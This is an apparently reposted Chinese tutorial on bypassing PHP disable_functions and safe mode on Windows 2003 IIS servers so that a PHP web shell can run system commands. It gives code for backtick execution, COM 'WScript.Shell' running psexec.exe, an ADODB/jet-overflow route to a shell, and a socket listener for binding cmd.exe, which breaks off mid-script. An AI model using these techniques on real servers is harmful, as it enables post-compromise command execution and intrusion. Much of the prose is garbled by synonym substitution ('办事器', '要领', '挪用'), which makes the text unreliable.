突破Windwos 2003 PHP服务器的新思路

  从WIN2000到WIN XP, 再到WIN2003, MS IIS办事器安全性的进步是不言而喻的。 在WIN2000中, 一个普通的PHP SHELL便能把它打倒; 在WIN XP, 即使Safe mode = off,你也无法用system() 等函数实行系统命令, 但是我们还能用com()函数举行突破;到WIN 2003,即使IIS 和PHP都是默许安置,你用system(), com()也大概拿它没辙。这时间你就不得不使用一些新的要领来举行突破了。
  1、disable_functions的突破
  在php -4.0.1以上的版本，php.ini里引入了一项功能disable_functions , 这个功能比力有效，可以用它克制一些函数。比如在php.ini里加上disable_functions = passthru exec system popen 那么在实行这些函数的时间将会提示Warning: system() has been disabled for security reasons，同时步伐停止运行。但是也不是没有办法实行系统命令了。因为php接纳了很多perl的特性，比如还可以用(`)来实行命令，示例代码如下：
    $output = `ls -al`;
  echo "

$output

";
  ?>
  听说这个只有设成safe_mode为on才能避免，但前次我在一台国外的办事器上使用的时间照旧失败了，人并不是什么时间都能那么走运的：）
  2、dl()函数的应用
  当任何PHP的内部命令实行数和''都无法使用的时间，可以尝试dl(),该要领只能用于safe mode=off, 因为它在安全模式下是被禁用的。使用dl()你可以直接挪用W32api 函数，惋惜这个扩展已被挪动到 PECL 库中，临时PHP 5.1.0以下版本起不再被绑定。以下是手册里的例子：
  // 加载此扩展
  dl("php_w32api.dll");
  // 注册 GetTickCount 函数，来自 kernel32.dll
  w32api_register_function("kernel32.dll",
  "GetTickCount",
  "long");
  // 注册 MessageBoxA 函数，来自 User32.dll
  w32api_register_function("User32.dll",
  "MessageBoxA",
  "long");
  // 取得开机时间信息
  $ticks = GetTickCount();
  // 转换为易于理解的文本
  $secs = floor($ticks / 1000);
  $mins = floor($secs / 60);
  $hours = floor($mins / 60);
  $str = sprintf("You have been using your computer for:".
  "\r\n %d Milliseconds, or \r\n %d Seconds".
  "or \r\n %d mins or\r\n %d hours %d mins.",
  $ticks,
  $secs,
  $mins,
  $hours,
  $mins - ($hours*60));
  // 表现一个消息对话框，只有一个 OK 按钮和上面的开机时间文本
  MessageBoxA(NULL,
  $str,
  "Uptime Information",
  MB_OK);
  ?>
  惋惜我还没有理解透彻dl()和W32api, 以是就不乱举例子了, 省得误导读者。
  --------------------------------------------------------------------------------
  3、COM 和 .Net(Windows)函数的应用
  COM（Component Object Model,组件工具模子）是微软开辟的软件规范，它用于开辟面向工具的、编译好的软件组件，它容许把软件笼统成为二进制的部件，重要运用于windows平台。
  PHP 的 Windows 版本已经内置该扩展模块的支持。无需加载任何附加扩展库即可使用COM函数。它的使用要领雷同于C++或Java中类的创立的语法，并把COM的类名作为参数传递到结构函数。比方使用在PHP中挪用“WScript.Shell”实行系统命令：
  $cmd=” E:/cert/admin/psexec.exe”;
  if($com=new COM("WScript.Shell")) echo "yes";
  if(!$cmd1=$com->exec($cmd))
  {
  echo "can not exec()";
  }
  if(!$cmd2=$cmd1->stdout())
  {
  echo "can not stdout()";
  }
  if(!$cmd3=$cmd2->readall())
  {
  echo "can not readall()";
  }
  echo $cmd3;
  ?>
  图1是我写的一个实行psexec.exe的一个例子。
  这段代码与ASP的的意思是千篇一律的，当然，你也可以像ASP那样挪用“ADODB.Connection”，使用这个组件结合jet2溢出毛病，大概能够在PHP Saft mode=ON下拿到一个Shell。
  //create the database connection
  $conn = new COM("ADODB.Connection");
  $dsn = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("mydb.mdb");
  $conn->Open($dsn);
  //pull the data through SQL string
  $rs = $conn->Execute("select clients from web");
  …..
  ?>
  .Net 函数只能运行在 PHP 5上，当然，它必要 “.Net runtime”的支持，并且这的PHP的一个实行性模块，功能还未齐备，以是在这就不讨论了。
  4、Java()函数的应用
  该要领实用于safe mode=on。要使用JAVA模块办事器必须事前安置Java虚拟机，并且在PHP安置配置的时间打开了with-java的选项，代码如下：
  [JAVA]
  ;这是到php_java.jar的途径
  ;java.class.path = .\php_java.jar
  ;JDK的途径
  ;Java.home = f:\jdk1.3.0
  ;到虚拟机的途径
  ;Java.library=f:\jdk1.3.0\jre\bin\hostspot\jvm.dll
  同COM一样，使用Java创立类（不但仅是JavaBeans）只需把JAVA的类名作为参数传递到结构函数。以下是手册里边的一个例子：
  // This example is only intended to be run as a CGI.
  $frame = new Java('java.awt.Frame', 'PHP');
  $button = new Java('java.awt.Button', 'Hello Java World!');
  $frame->add('North', $button);
  $frame->validate();
  $frame->pack();
  $frame->visible = True;
  $thread = new Java('java.lang.Thread');
  $thread->sleep(10000);
  $frame->dispose();
  ?>
  惋惜能真正支持JAVA的PHP办事器并未几见，以是在这也未几讨论了。
  5、socket()函数的应用
  socket 是PHP中功能极为壮大的一个模块，如果你使用高级的、笼统的接口（由fsockopen()和psockopen函数打开的socket），是不必要打开“php_sockets.dll”的。但是如果要使用完备的socket函数块，就必须在php.ini如许设置：
  ;Windows Extensions
  ;Note that MySQL and ODBC support is now built in, so no dll is needed for it.
  ……..
  ;去失以下一句最前边的分号
  ;extension=php_sockets.dll
  使用PHP的socket函数块可以完成端口转发/重定向、数据包嗅探、当地溢出等功能, nc能做的, 它大部门都能做到。并且, 还可以用它结构TCP/UDP办事器， 同时, 我以为它也是突破办事器安全策略的一个最好的办法。以下即是一个在办事器上打末尾口结构TCP办事器的例子，你可以用它来捆绑上办事器的cmd.exe：
  //在办事器上结构TCP办事
  //该例子必要php_sockets.dll的支持
  //实行后便可使用” telnet 127.0.0.1 1020”毗连
  error_reporting(E_ALL);
  /* Allow the script to hang around waiting for connections. */
  set_time_limit(0);
  /* Turn on implicit output flushing so we see what we're getting
  * as it comes in. */
  ob_implicit_flush(); 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:

评论加载中... 内容： 评论者： 验证码：